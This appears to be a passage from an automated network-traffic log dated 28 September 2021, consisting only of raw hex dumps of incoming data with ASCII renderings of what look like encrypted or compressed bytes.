                                              2021-09-28 11:02:14 UTC196INData Raw: 78 72 1b 3f c5 ab 78 be 0d c3 8a 7f 1c e6 52 c2 3b d1 ec c9 d3 1e c9 b9 04 95 e4 d7 3e 49 d2 7e 8d 25 bf 7b ac 38 f8 2f 44 62 66 60 1f d7 ca 98 be 19 0e ec 67 68 a8 c1 b3 28 cc d3 3f ac 38 f3 56 9a 7a b7 64 6f fe 27 70 8a 3a 11 8b ef 79 88 4a ec 7f 69 9f 6d de 9b 0a f2 7e 47 8a a5 f6 77 8e f8 a4 bb 86 c4 d9 9a a6 89 33 52 ec e6 20 ba 88 d7 94 3c 7b f3 8f d5 71 75 67 f9 51 ed fe 9c 81 7a 08 10 f0 49 08 a9 79 6c bc 23 f2 1f 98 17 cf 04 a1 44 14 18 a5 48 28 1f 26 ec 5d bc 3f 69 1f d0 61 bc ba bc 39 a0 fe 1d 83 a0 0d 95 38 a5 2b f2 46 9c 0b 2f 40 8a d6 49 7b b9 75 55 12 ac 94 d8 54 42 82 79 48 b0 d1 16 04 52 7c a5 98 a2 0a dd 88 6d 1d 11 10 77 f6 72 fa 86 e4 8f 76 f8 24 1a 44 ee c2 4e 57 50 a9 ca a7 6e e8 15 d5 c1 f3 8e 6a ef d2 14 7a a6 dd 95 e6 aa 28 10 5e
                                              Data Ascii: xr?xR;>I~%{8/Dbf`gh(?8Vzdo'p:yJim~Gw3R <{qugQzIyl#DH(&]?ia98+F/@I{uUTByHR|mwrv$DNWPnjz(^
                                              2021-09-28 11:02:14 UTC198INData Raw: e0 11 f6 60 ad e4 0f 82 7e b1 a6 f7 08 c4 eb 19 ad c5 5d 6f 90 e0 86 53 5a 9a 25 6d 8f c0 c0 a0 ee ce 0f 0b 08 b7 4a 76 89 d1 bb b7 c2 57 5e 61 f3 5a 0b ab 1c 28 db ad 99 04 20 08 3a a8 b8 c5 89 91 72 2f 99 fd 9f eb 09 25 cb 11 ee 27 62 88 69 07 fb 47 65 bb c1 d8 4d ae e1 e3 62 9f ba 77 db d8 9c ea d4 75 01 c6 2f 3b 07 a5 70 02 98 db 11 e3 cc 81 5c c2 90 ce f0 80 80 da eb 19 ac 9b 99 23 ce 1d d2 e4 1e 0c 80 a9 0d bd 8c 42 31 2a 62 43 1e 8c 37 40 78 1f af 4a 9c 18 42 e5 23 d5 2d 0c 9e 4e fd 7a 83 1e 61 9a 8c 83 0e f4 1c b1 45 e8 93 81 57 a1 65 d7 75 77 20 21 35 88 8a b0 90 95 62 68 bc 20 db da d7 4a b1 d4 e3 b0 ef a7 01 5a 96 f5 2d ae 33 48 c8 96 fa a7 6d 38 49 9c 0d cf e2 19 5e 5c 91 98 5e ba da d9 cf ad 86 e8 73 87 76 aa db 44 00 a6 9d 02 1f 9b 7d 91 a2
                                              Data Ascii: `~]oSZ%mJvW^aZ( :r/%'biGeMbwu/;p\#B1*bC7@xJB#-NzaEWeuw !5bh JZ-3Hm8I^\^svD}
                                              2021-09-28 11:02:14 UTC199INData Raw: f9 a5 6f 4b 37 fd 25 0c ab 0d 67 b2 4d d3 1f eb 16 ae 4c b0 51 64 29 a1 2a 1d 1b 55 f4 53 d2 2b 69 6b c8 40 a9 9c b8 4a a3 f4 07 af 81 6c a2 35 ca 08 e5 29 ac 07 3f 44 80 c1 68 1a 99 66 2c 05 a8 92 e4 53 28 b5 7f 4a 91 c2 11 00 52 6f a5 92 a9 1b db fc 64 09 09 05 1e c5 61 e6 82 c5 98 6e e4 07 1a 44 ea c2 4b 50 24 a1 cd de 48 e5 74 e2 c7 a0 bc 69 9b f0 76 3f 8a d6 e1 e8 ba 6a 00 53 b0 35 ed b0 05 23 a0 9a a6 fb e3 85 ef f1 cb df 34 36 f4 c1 f6 e2 6a 4f 93 b5 6f f9 f6 ea bf 5a 29 9a cf d7 34 bf de ee f1 5b 61 16 cc 32 62 12 3d e5 89 06 da 29 9b c9 e1 e6 47 01 29 41 ab 94 4a c9 a8 df 14 0d d6 e0 02 b6 3e 2b ef 2f e0 85 b3 5f 3f 27 f0 c9 83 86 5d 97 a9 91 96 0f ff 10 13 39 10 9a 47 d7 6d 6b 51 17 42 91 db 29 84 df 45 fe 75 2a aa 41 fd 30 a6 2d 72 c7 af 02 53
                                              Data Ascii: oK7%gMLQd)*US+ik@Jl5)?Dhf,S(JRodanDKP$Htiv?jS5#46jOoZ)4[a2b=)G)AJ>+/_?']9GmkQB)Eu*A0-rS
                                              2021-09-28 11:02:14 UTC200INData Raw: 97 85 2d af 35 d4 e9 11 02 83 ad 69 ba 97 74 37 31 67 2f 3c e9 24 75 7e 29 91 4a 86 19 7e f2 4c e1 31 0e 8f 74 e4 6d ac 19 63 f6 ab a4 02 ea 19 af 45 bb b4 92 58 aa 4a b6 4f 7c 1f 30 47 b3 91 b9 e4 bb 6a 79 bb 2d d9 d6 f1 4c df e3 fa b7 9c 81 16 5f 9d f3 5e 98 02 5a d2 97 fb ec 29 09 5a 8e 05 d5 e0 51 6b 5d a0 b8 54 d4 fa bc ef 96 b3 f7 78 a6 04 a2 d3 78 3e ad 97 0f 18 f7 70 bc a3 87 44 a1 44 32 27 5e f0 3f 97 67 02 99 c8 da d0 f5 c8 e9 af 16 96 3d b8 b6 a1 cb e4 e6 9c e6 c2 2a d2 4c 48 01 43 e3 c1 ad 1f a9 62 0f 4f 86 c5 b5 39 80 4b 7b 20 2d 48 52 59 33 83 14 b5 07 cc 60 db 29 c3 49 35 1c 7d fe 1d 1f 4a ae d2 52 7b d7 ef 9d 58 3e ed c1 6d 31 fb 2c 59 7e 99 e7 53 1a 7c 21 a9 9c 52 d6 4e d7 eb 4f 2d e6 70 fe 4f c8 f0 b1 f1 24 bc 85 3c f7 e9 eb 6e 4a ff 16
                                              Data Ascii: -5it71g/<$u~)J~L1tmcEXJO|0Gjy-L_^Z)ZQk]Txx>pDD2'^?g=*LHCbO9K{ -HRY3`)I5}JR{X>m1,Y~S|!RNO-pO$<nJ
                                              2021-09-28 11:02:14 UTC201INData Raw: 5b a2 32 d3 85 39 27 81 8f aa 8f e1 e0 df cb f7 db 32 32 99 a6 f1 fb 35 6f 9f db 5c e6 9f f9 bf 2e 22 bb c9 d7 38 db fe ff e4 70 41 01 e8 2b 16 36 35 f2 90 06 f8 4c bc d4 d4 d7 42 73 2b 45 bb 8a 78 d4 b6 d3 25 01 d1 f1 67 98 51 09 ef 23 fe 81 b5 71 34 2e c6 c2 91 86 5d 9e e8 83 8f 7d f1 1f 66 1e 0c f7 6d c7 70 7d 79 00 77 8f d5 24 83 c2 54 96 50 4f 8e 50 c5 3d 9e 36 7a da b9 2a 53 73 45 0e 33 ce ae b2 d9 5e 13 97 6e 93 7c 16 53 cb 85 dc c9 33 85 06 e8 d8 d2 c1 11 8f b0 4a 74 a5 72 ff c6 e1 ae 8c 07 30 b3 17 bb cb de e0 48 d9 85 ee 5e 94 0c 47 a2 09 be ef 4c 18 44 89 fa 7f 38 e7 f9 c8 e5 42 bb ff 68 7b 03 4e 6a 33 34 8f 39 d9 8c 36 02 f5 5f 4f 02 20 19 2a bf 1d e3 58 fc 64 be de 5c b2 69 ba a7 d4 6d f4 f7 08 b3 e6 2f 4d 9c da 89 6c 5a 8c 38 0c 8f c0 b4 be
                                              Data Ascii: [29'225o\."8pA+65LBs+Ex%gQ#q4.]}fmp}yw$TPOP=6z*SsE3^n|S3Jtr0H^GLD8Bh{Nj3496_O *Xd\im/MlZ8
                                              2021-09-28 11:02:14 UTC203INData Raw: b8 89 2b bc 21 03 16 4d f7 2c 9a 65 67 86 d3 cf b9 fc ca de 9f 36 95 3b ca 9d ba a4 c9 8e ce d7 c4 2a f0 41 3c 18 68 97 f4 a9 54 84 73 4b 41 99 ab d7 36 e5 72 45 07 26 49 34 49 10 e6 08 99 68 dd 66 db 29 ce 3d 0d 38 65 d5 06 1b 40 99 ca 4a 67 b3 f4 93 48 3d 88 f6 51 34 fe 2d 49 74 a6 e8 20 30 13 67 86 86 21 fa 21 9a cf 54 45 a0 78 9b 7c f8 b5 81 fb 47 8a 9e 30 e5 e4 fc 5b 7f e4 7e ad 13 cf 66 a1 57 9d 17 2b 04 5d 0f 78 ed a5 da 80 76 4d d3 08 2c 95 a4 82 2d 85 fb 03 c3 7f e0 3b b3 47 d2 46 5a 9a 20 49 c3 37 2d e4 8b 65 e1 4a da 1b 46 ab 0b d6 c1 4c fc 77 56 9c bd f1 74 fb de 8e 88 f2 c2 ce 8b b0 91 34 51 99 c5 16 89 ed c3 90 4e 4b fb e0 ff 59 1b 44 f7 51 ec fa e8 90 7e 7a 2b f8 26 07 81 17 68 b2 23 c2 1b ea 1a cf 68 ad 5f 75 0a ad 27 21 37 48 e2 53 bc 2b
                                              Data Ascii: +!M,eg6;*A<hTsKA6rE&I4Ihf)=8e@JgH=Q4-It 0g!!TEx|G0[~fW+]xvM,-;GFZ I7-eJFLwVt4QNKYDQ~z+&h#h_u'!7HS+
                                              2021-09-28 11:02:14 UTC204INData Raw: 55 7e 49 7a 1a ca ae b4 de 3b 22 82 45 85 61 14 21 82 85 c2 d5 22 83 39 ce c5 d9 ca 01 9d 9a 4a 6b ca 45 91 e0 e9 da 9e 1b 5f 9a 1c d8 fb f5 92 7f d8 f7 a8 63 fb 28 42 c7 35 95 9d 6a 18 74 e6 f2 76 29 d9 d9 bd c1 53 92 e4 58 6a 0c 42 42 3c 3c b5 3d c7 ed 26 0d 81 53 53 02 0d 32 44 86 15 e8 2a fa 75 a5 f3 0f 9c 7a b1 a3 dd 08 da fd 16 be ef 3f 48 94 ea 9e 5b 51 9c 3b 69 9a c4 b4 8e f8 aa 1a 0f 12 95 41 03 a7 c6 ac b2 d3 56 58 08 d3 55 3c a3 09 21 ca c2 ae 6a 6a 22 20 b1 a5 ae c2 f2 53 3e 91 e6 f1 ef 08 3d cd 0e e4 55 25 ae 6f 27 f4 45 69 8d cb d5 52 b2 ff e3 5b 8c c8 5d c8 df 91 fb b1 79 2a cb 28 2f 12 a3 7e 12 f4 ec 74 cb ec a1 41 c6 af c9 e3 e2 a5 d1 b8 24 8d fe a6 23 cb 22 cf f3 0b 3d 98 be 0d 8e 86 72 01 17 6f 5a 09 8c 12 56 0c 03 94 2b b6 0f 2e c5 50
                                              Data Ascii: U~Iz;"Ea!"9JkE_c(B5jtv)SXjBB<<=&SS2D*uz?H[Q;iAVXU<!jj" S>=U%o'EiR[]y*(/~tA$#"=roZV+.P
                                              2021-09-28 11:02:14 UTC205INData Raw: 19 8b 04 f0 6f 81 51 f2 18 37 04 58 05 0c d1 8d a8 8b 6c 3d c5 67 4b 97 b5 a9 31 a4 f4 17 df 7f ee 33 a6 63 df 64 47 8d 45 6d ef 2d 02 e6 ea 44 ed 6a d8 1c 60 a1 08 cb b2 0a c6 62 40 a1 b6 fa 35 af f4 96 81 f4 c4 bc bc 8c 91 26 57 f4 e6 37 80 e4 e5 90 4e 4b 92 e8 f4 64 2a 43 fc 27 ca f1 ff a3 7f 58 39 e3 28 04 ad 0d 6b af 50 91 0d fd 07 f1 65 a0 53 75 10 a7 2d 2b 2e 47 f6 5d d1 3d 78 0e fd 56 dd 8b b3 5a bc ff 0c ae b4 0d 93 38 c8 1e f4 4c 9a 1d 4c 7b 9f d7 7f 7b b9 7b 27 26 c9 ad f6 58 49 80 7f 51 91 de 16 26 3e 4d a4 84 c8 2c d1 92 4d 15 11 18 18 c8 61 f9 b5 ee 90 72 e0 12 1e 7f ed a8 69 56 24 a6 cd d4 59 8a 53 f9 cf 96 89 6b 8c f0 05 09 ee d8 f0 f3 97 7b 07 5f a4 23 ff a1 69 01 96 9a 84 fa f4 f7 ce fa d3 ea 32 3c 97 c3 e0 e5 35 45 a2 9a 5c ef ed fb a9
                                              Data Ascii: oQ7Xl=gK13cdGEm-Dj`b@5&W7NKd*C'X9(kPeSu-+.G]=xVZ8LL{{{'&XIQ&>M,MariV$YSk{_#i2<5E\
                                              2021-09-28 11:02:14 UTC207INData Raw: 8e e9 cb 31 2f 08 b4 7f 19 a3 cd aa d3 c0 5c 5e 57 d1 59 3d a4 0b 40 d9 c8 a8 35 10 28 37 b5 94 c1 99 ff 44 4a b9 f1 85 e1 0f 32 d6 39 e4 52 4b 99 1d 07 fb 55 4d aa cd d3 50 bf 8f d5 51 99 a1 70 fb d9 93 ea a4 48 44 ea 19 24 1b a7 65 24 91 dd 63 d3 f8 9c 2f f0 bc cf e8 92 98 fa 85 33 8d 87 9b 3e af 25 d3 ec 1a 0f 88 9f 79 88 91 72 5e 1c 6f 41 0d e9 22 51 0c 27 82 5f ad 2c 41 f2 57 87 2b 07 9e 78 c0 70 b7 03 04 91 8d bf 30 d3 16 a9 45 9a ae 81 5d 97 48 c4 6d 76 3e 14 5a a8 8b de 97 99 7b 52 a1 37 df da ed 45 be dc dc b0 9d 83 01 44 a3 fb 2c bf 7b 7a c9 80 e2 c2 0a 1e 4f a6 1c d4 f5 25 3f 41 90 80 64 ca f2 ce cf f9 b9 ec 66 96 61 a7 e4 69 10 bd 9c 1d 0e 9b 5d 84 b8 90 13 b7 43 14 1d 4a eb 3b 86 7f 67 8d ca d1 9e fd c9 f8 bc 32 96 2e b8 93 ac bf f8 c6 f3 d1
                                              Data Ascii: 1/\^WY=@5(7DJ29RKUMPQpHD$e$c/3>%yr^oA"Q'_,AW+xp0E]Hmv>Z{R7ED,{zO%?Adfai]CJ;g2.
                                              2021-09-28 11:02:14 UTC208INData Raw: 15 69 06 e0 57 a4 ce 9e 4b b6 fa 1d b9 a0 05 93 3c c6 0f ef 5b 91 6e 2b 51 9b ed 5f 7f aa 7d 26 21 bb 99 97 51 4d 93 45 7f 95 c0 03 06 3b 58 ae f7 99 1a df 90 40 08 1c 71 18 d6 5f d0 87 f4 9c 6e e8 14 02 30 e0 b2 53 7c 3e 8f d9 d2 4b e6 7c e4 da f3 af 6d 9b ca 06 08 87 d0 e7 ee bc 51 72 4f a2 32 d3 a2 1b 2f 9c 9c ae fb ff 85 f8 ed d4 ce 25 3e da f5 f6 f5 40 7e 9b af 41 8b d6 ed 94 2f 11 9e f2 c0 10 b6 fd ee e9 2f 4a 36 ff 3f 66 14 13 e2 88 22 cd 46 b8 f8 d2 c6 56 73 0e 63 bd ac 4e c9 89 d3 02 28 d0 ea 72 90 23 32 e6 46 ff 85 b5 47 0a 3b fa c3 9b f2 71 a4 8d 87 b2 0f f9 0a 1f 4d 36 f6 69 d2 66 60 71 11 52 b3 c0 24 89 d2 20 b8 54 23 a3 62 cf 26 ab 3f 70 e5 b9 2c 5f 62 28 49 1a ee 8c a9 db 26 38 f6 52 92 74 12 20 f6 b4 d7 e0 31 9e 11 c5 aa f1 d5 62 aa a5 38
                                              Data Ascii: iWK<[n+Q_}&!QME;X@q_n0S|>K|mQrO2/%>@~A//J6?f"FVscN(r#2FG;qM6if`qR$ T#b&?p,_b(I&8Rt 1b8
                                              2021-09-28 11:02:14 UTC209INData Raw: 31 07 89 67 ca 27 82 9f 10 71 24 f7 e9 d9 ef 4f 6b da 28 fa 40 2d 23 44 fc a4 9b c6 51 41 27 5a 0e d6 f8 f4 0c 2d e8 53 a1 9f 9c 2a d1 a1 0f 20 fe 75 9d 32 f3 95 56 d7 7c 09 a5 fa 8b c7 65 73 3c d9 6f ba 9a 54 37 3a f0 f4 39 bb 93 b2 be fe fd 8a 4b c9 01 c5 b7 1e 04 c6 ea 69 73 95 07 71 cd ee 56 53 24 48 76 35 8c df fc 19 e6 c4 a2 9d d0 80 2c 90 f5 7b e5 48 39 e5 cc eb a7 9c 1d b7 ae 0a 96 38 46 44 0b e3 84 c6 3f e1 01 0b 2e ef c8 cb 55 80 07 17 59 4b 20 50 30 56 8b 75 dd 06 a4 05 de 4e aa 47 43 51 06 a6 4a 76 37 c0 b7 58 1b d6 b5 95 23 4b ff e7 06 5c 8b 4b 48 1d d1 87 3d 60 19 69 ce ee 25 a3 5c 1b af 29 c4 c3 1f 93 3e b7 b5 d8 15 6e c0 f1 5f 97 94 0f 17 3a 0a 57 e8 7c bf 02 e7 b9 b8 7e 44 05 2d e1 5d 9c 4b f7 e0 1e 4f b8 69 2a f2 c3 eb 7c c2 9b 62 ac 7b
                                              Data Ascii: 1g'q$Ok(@-#DQA'Z-S* u2V|es<oT7:9KisqVS$Hv5,{H98FD?.UYK P0VuNGCQJv7X#K\KH=`i%\)>n_:W|~D-]KOi*|b{
                                              2021-09-28 11:02:14 UTC210INData Raw: 5b bf 78 f2 bf bc 5d d5 8b 9d 93 21 15 7b 85 43 36 60 46 06 15 71 bf 29 d0 95 a0 b1 27 6b 5e a1 52 dd 3a bd db be 6e 7d a2 84 00 e8 54 43 9f 44 85 e9 c8 11 5a 4d 97 a3 ff fb 31 e3 e1 e7 c8 75 97 7a 6f 4d 71 93 18 ba 16 8e 8d 6b 30 e3 b0 43 e9 bb 28 fa 3d 4e ce 39 bb 55 d8 52 14 bc d6 46 35 9a b5 06 76 82 dd ce a5 59 4b f8 09 e5 7a 66 5a 90 a3 a7 b8 4b e3 e8 21 a2 b6 af 63 fb ba 30 1c a5 36 99 a1 b9 ad ee 69 28 f4 79 ba 97 ba e8 0a b2 8b a6 3e 9a 59 40 a4 41 d1 fd 99 82 08 ee 92 17 4f 07 0a c6 a4 39 ff 91 1f 1e ee 12 32 53 58 e5 58 b7 8e 53 6b f0 32 23 0a 4c 7f 2f f4 7a 83 4a f2 05 ea 80 01 d9 1e ff c2 a8 ec 4e 9e 78 cb a1 4c a3 0c 86 ed 17 31 e1 4b 09 ea bd d8 e9 98 2b c0 78 0f d4 2f 77 d2 ab ff d4 bb 2b ab 48 9c 3f 46 c2 62 45 b6 a4 d5 63 4d 49 5d d0 df
                                              Data Ascii: [x]!{C6`Fq)'k^R:n}TCDZM1uzoMqk0C(=N9URF5vYKzfZK!c06i(y>Y@AO92SXXSk2#L/zJNxL1K+x/w+H?FbEcMI]
                                              2021-09-28 11:02:14 UTC212INData Raw: a7 bb aa 77 36 c9 a6 25 eb 94 45 d7 f3 8a cf 26 e9 c1 df 4c 85 1b 1f 5c 4b 20 53 20 5e 81 7f da 01 b7 0d d3 53 ae 54 57 64 0c b0 cd aa 3f dd a4 2f 8b ee a9 f0 2b 52 f0 87 13 dc 57 48 ad cf df 8e 2a 75 78 7a c0 f4 24 a3 4b 87 8f 3f 4d e6 05 af 3f 9f b5 db a8 44 de 71 dd 96 83 9f 16 29 a4 7e e4 7b ba 03 e8 24 80 6a 59 06 37 68 78 8a cb c7 e1 17 43 b8 4c 2b e7 cf eb 77 c2 9b 78 a9 71 bb d6 07 3d b2 17 b5 33 57 aa 5b 57 56 8e 85 31 08 f6 aa 6d 8f 10 7f d0 d3 63 84 9a 0a df c1 16 ba fe bd fb f6 04 ca ba ee fa f1 5c 22 85 84 7f e1 86 9b e9 20 24 9e 8f 97 11 7b 2c 85 54 a5 91 8e 44 6e 0f 5f 92 47 7b 4a f8 06 d4 24 92 6c 1a f6 bc 86 45 2d 01 79 cc 46 52 7b 34 06 bd ae da 89 76 8a 37 5f d3 c0 3c c1 19 5c da c4 6e ef 57 b8 7e 83 01 e8 60 4f 32 fd 8a 09 1a cc 0c 4d
                                              Data Ascii: w6%E&L\K S ^STWd?/+RWH*uxz$K?M?Dq)~{$jY7hxCL+wxq=3W[WV1mc\" ${,TDn_G{J$lE-yFR{4v7_<\nW~`O2M
                                              2021-09-28 11:02:14 UTC213INData Raw: 31 19 a6 2a 9f bd 82 bf 4c 90 1e f7 68 ae 9d 31 79 0c a5 04 e8 25 86 ca b0 a3 4f c5 fd 99 ee 07 f4 14 53 53 88 8a cd a2 23 77 36 0e 66 67 25 21 4f d1 a6 4a de 84 49 62 fd 10 26 0c 51 65 ab 6a 79 9f d9 db 14 d8 00 96 d0 15 ca d0 3b f4 b6 8a f9 8a ae 41 3e ff 87 f7 1b 23 f5 44 65 fd b4 41 44 8b a4 4f eb c7 d6 3a 67 4b 06 df dd 95 3e 3e 1d 80 b7 d1 cb 6d c1 fe b8 ce eb dd 40 5a cb c5 2f 75 90 22 cb be 9a ff ac 69 4e a1 74 99 a7 85 e3 0f 2b 9d 23 8d 89 bc df 28 d6 81 9f 29 f0 c0 11 ba bc f8 9f da 2c 4a b8 54 44 e3 4a 19 70 fa 86 16 b3 9d fa ae 2b fe af 10 a2 e2 b1 fe 42 7e 67 ea 58 2e 31 a6 9b 62 60 e2 de 60 e7 f1 6b 50 4d 6d 3d fa cc 5e 38 09 52 8e 36 f7 74 33 8e 2b 9a 56 6a f7 29 8d 1c d8 79 01 d6 e9 d9 02 94 7c fd 20 f5 ce fb 36 ca 3f 37 5b 01 cd 04 3b d2
                                              Data Ascii: 1*Lh1y%OSS#w6fg%!OJIb&Qejy;A>#DeADO:gK>>m@Z/u"iNt+#(),JTDJp+B~gX.1b``kPMm=^8R6t3+Vj)y| 6?7[;
                                              2021-09-28 11:02:14 UTC214INData Raw: 78 a7 43 c0 a1 2e 04 27 7f 05 38 ee 57 5e 99 0a ba 89 3d 37 3f 01 d7 ec f9 cf 04 96 0e 22 57 62 95 15 ee 8f 79 ed 84 b9 b2 fb e8 7d e3 3c 97 8d 77 eb 80 98 f2 36 36 8e 93 8d 0c 7d 2a 84 4c b7 97 99 c6 19 00 56 99 58 6e c1 65 00 c0 26 8c 7b 84 61 2c 31 d8 37 7d 63 d8 6b 48 72 28 91 2e 3d c1 0d 79 0e 65 c8 dc 5c a0 d2 89 e8 9c f9 62 ef 45 ab 69 01 69 fa 07 44 29 e1 a0 8c bb ed 13 5e 5b dc f2 16 af 29 f5 9b 7c e1 a2 e3 fc 53 3e 56 b7 c6 61 b0 f2 27 6e e4 31 65 27 40 87 9f 91 fa 0e 9c 65 75 38 87 df 09 3b 58 e2 ab af 22 82 11 b0 a2 fb cb 02 e8 93 6b 7f e6 a2 90 8f c0 20 5d 3b d2 53 9e 53 f0 47 e1 6f 87 81 88 90 b9 15 3e bb 52 d2 b4 a8 8e 98 3d 04 ef d5 36 85 91 83 d4 48 fc b2 af db 47 b2 85 92 8d 21 15 7b 90 45 1f 40 56 9a f2 6f b1 38 4b b0 a9 b5 28 7d 42 23
                                              Data Ascii: xC.'8W^=7?"Wby}<w66}*LVXne&{a,17}ckHr(.=ye\bEiiD)^[)|S>Va'n1e'@eu8;X"k ];SSGo>R=6HG!{E@Vo8K(}B#
                                              2021-09-28 11:02:14 UTC215INData Raw: 46 a0 ea b1 30 57 ec 14 60 87 60 5c b1 68 0a be 24 ff 9c 02 80 23 8d 50 af a4 a1 8b 81 8a 3a f0 c6 10 b4 a8 71 cf da 32 56 c1 47 55 6a ca 1f 44 f3 b3 04 b8 09 71 2e a0 7e fd 84 f0 6d 26 ea 42 7e be e5 44 a1 6d b5 90 6d ef dd de 8c a9 ed 14 df 6e 12 46 73 8b 54 37 39 4e f5 1e fa 78 0e 80 31 fe 5d 42 eb 35 a5 11 c3 57 06 e4 dd c5 61 92 7f d9 2e fa 40 39 3f cc 29 b0 0a 92 65 46 33 c6 fc d8 f6 88 09 0a ea 48 2a 96 97 2d ff b1 8e c4 6e dc 61 31 f1 86 2a c3 7f 09 a6 e0 e2 c7 4d 7a 3a eb 18 b2 a7 53 3e 20 76 99 2a 39 ec ba 9b fb e3 96 04 f4 07 ed b6 04 64 e0 f9 7f fb b2 16 d8 cc fc 40 fa 21 54 0c 33 98 4b e7 89 6e d7 a9 a1 da 95 af 88 e2 d9 ec 58 b6 e8 c1 c2 87 8e 89 b0 28 23 95 2a 54 4d 0b e2 87 d0 0d 63 03 0d 20 f2 c6 ff 51 82 0f 32 54 5b 32 d0 34 59 8d 6d d9
                                              Data Ascii: F0W``\h$#P:q2VGUjDq.~m&B~DmmnFsT79Nx1]B5Wa.@9?)eF3H*-na1*Mz:S> v*9d@!T3KnX(#*TMc Q2T[24Ym
                                              2021-09-28 11:02:14 UTC217INData Raw: 5b 5b d4 e5 9f 38 3a 66 fb 3e e6 32 37 77 3b 3d 57 17 c0 73 a2 e0 21 74 45 73 7f bb 05 84 75 2c d0 05 9b 75 69 b1 16 c3 02 3b 5e e4 b5 a9 28 84 1d 9e ad ef da 89 72 9d 78 72 e6 b1 9d 89 d5 2b 7a 21 c9 5b 8f cf 6a 53 e2 6f 62 8e 88 8d ac b4 a5 b8 4e 42 77 db 95 b6 34 1e 73 46 24 8d 9f 9c d8 54 6d fa ae b2 52 d9 9f 1b 71 3f 06 65 85 56 18 70 56 97 f2 62 a2 2c d9 9a ac ba 33 7b 44 28 cd dd 36 a0 c6 ab 6a 65 a0 8d 08 d5 55 4e 82 43 84 e8 d0 9b f7 4c 95 b9 ea fa 30 f8 e8 e6 e0 6f 17 93 76 43 65 87 05 a5 04 0d 0c 71 b7 02 bc 41 f1 a8 3c ec bc ae d7 b1 56 5b cd 12 1d e1 cb 17 27 4b 28 21 7f ab dc f5 b4 6f 41 d6 00 f1 14 79 41 03 27 a6 bc 63 f2 68 ad 28 d2 be e1 58 ce bb ac a0 37 91 a1 0d 4f cb 41 30 e2 f9 5e 8a 98 e0 1f 37 45 ad 10 96 4a 27 aa 46 f0 eb 19 79 0e
                                              Data Ascii: [[8:f>27w;=Ws!tEsu,ui;^(rxr+z![jSobNBw4sF$TmRq?eVpVb,3{D(6jeUNCL0ovCeqA<V['K(!oAyA'ch(X7OA0^7EJ'Fy
                                              2021-09-28 11:02:14 UTC218INData Raw: da cf de ca fc 3b 0d c6 59 98 bf b1 2b e9 b0 a1 d5 95 f5 0d 36 83 94 56 cc 7e 34 a3 ee 9e cc 65 7f 1b f8 6e b3 8f 56 3c 20 90 fc 26 a8 f8 b5 bc fc f7 84 0a d3 6d d8 aa 1f 66 c0 f7 7c f9 7e 1b e2 a5 f2 c4 36 3d 54 f8 d7 8c df 54 2d 60 c7 a9 b3 de 9a a3 8f 71 6a eb 48 39 c5 db 48 42 9c 1e 17 a2 36 85 a7 ad 55 a9 56 94 44 be fc 16 12 32 fc 44 76 57 a0 07 08 d6 8f 2e 49 3a 4a 8b 6d c1 1a af 06 d5 52 b6 4c 5c 64 0c bd 50 7b 25 c0 a0 20 15 ae bb e1 29 53 ed 82 10 df 62 5e 2d 18 df 9b 25 7a 74 62 c5 e9 33 3d a3 88 8d 3c 59 e8 05 18 ca 85 34 c4 86 c6 c0 e3 34 87 04 9f 3b 0b 8b 6c 6d 89 b9 3f f4 2a 1e 8f 4a 16 38 67 76 80 d8 59 15 0b cc bb 75 ad fb d3 9f 60 4d 84 6b ab 77 a7 4a dc 3c ab 17 5c e3 59 38 0b f8 40 8c 8d 3e 8d 21 be 6d 8e 58 65 b1 c6 0a 97 15 21 56 3e
                                              Data Ascii: ;Y+6V~4enV< &mf|~6=TT-`qjH9HB6UVD2DvW.I:JmRL\dP{% )Sb^-%ztb3=<Y44;lm?*J8gvYu`MkwJ<\Y8@>!mXe!V>
                                              2021-09-28 11:02:14 UTC219INData Raw: 22 cd dd 35 a8 c8 37 32 7b b1 85 11 f4 42 44 98 41 8f ee d0 98 ba 41 92 bb e0 fc 29 73 08 eb e6 7b 87 f3 36 4b 75 99 0e aa 0c 07 13 64 37 eb bb 4b f3 aa 32 7c 38 5e 42 28 be 54 df 52 1d b5 cb 43 27 05 29 0e 7e 9a 88 d9 a2 09 33 97 70 b9 7c 15 16 fa a5 cb c0 37 98 06 d2 fe db dd 0d 9e ac 39 30 a4 37 b5 87 ed 9d f8 0c 01 92 4b 96 ed 89 d5 35 9a b1 cb 51 ac 66 10 c3 70 b5 c2 79 47 65 de f4 26 6d e3 f3 aa 95 08 f7 96 1c 27 19 28 2f 5d 50 e6 58 b7 8c 54 6c cb 4a 22 02 44 57 2a f3 78 8d 58 9b 01 ca 81 0f d1 1b df c2 ba 6d b7 98 78 ca a0 5d 12 87 8a ea 1e 3f e9 56 0c e8 fa 83 8e f8 ef 25 0f 2b b1 46 18 ca ce ad b0 c8 4b 4f 6d bc 52 24 a6 7f 40 be ad dc 95 61 41 74 9e d7 ae ec 91 30 4a fe 94 f1 a2 67 53 a4 7a 8b 27 25 ed 1d 42 95 31 0c c9 ae b6 20 cb 8f 97 34 fe
                                              Data Ascii: "572{BDAA)s{6Kud7K2|8^B(TRC')~3p|7907K5QfpyGe&m'(/]PXTlJ"DW*xXmx]?V%+FKOmR$@aAt0JgSz'%B1 4
                                              2021-09-28 11:02:14 UTC221INData Raw: b1 07 ec 08 b2 4e c7 49 37 79 67 a1 2c 7e 54 dd c0 3d 09 b3 e6 fc 73 56 b4 82 44 5c fb 59 5a 1b 82 86 4a 72 0a 67 82 e9 62 be 00 9a de 3b 21 e6 6e 9b 70 97 f4 c9 d9 47 ae f1 14 95 d5 8e 5a 2b ec 7e a3 7c d8 1f 99 38 cf 76 03 04 7e 60 36 8e 84 da a7 19 3c b6 0f 2c 80 c1 85 72 8d 95 00 ac 51 a9 33 d2 58 b7 60 35 fe 45 2a 8a 6d 4b 83 8b 22 88 7f b6 0d 0f aa 6d dd c1 7f 95 78 33 a1 d3 c1 1b 9e 9d 89 e4 f5 b7 d5 ee 96 ff 3c 3e 99 83 4f e5 a6 95 c5 3c 16 92 bf 91 3e 75 12 98 51 ab a7 9c ce 1b 09 58 d0 49 1a c8 0a 0e b8 23 fc 7e fa 73 c2 04 bd 25 34 7e 92 48 2a 7e 54 84 4f bc 31 0c 04 8f 4b dd ce dd 09 d3 b5 69 ec e4 42 e1 69 a5 55 80 19 e8 6e 4c 34 ef b2 0d f5 76 ab 69 6a b1 8d fb 16 5e 82 68 4f 9d df 0c 58 70 1d f9 c7 ea 4f db 92 4a 13 01 18 19 c1 3d b7 a3 d5
                                              Data Ascii: NI7yg,~T=sVD\YZJrgb;!npGZ+~|8v~`6<,rQ3X`5E*mK"mx3<>O<>uQXI#~s%4~H*~TO1KiBiUnL4vij^hOXpOJ=
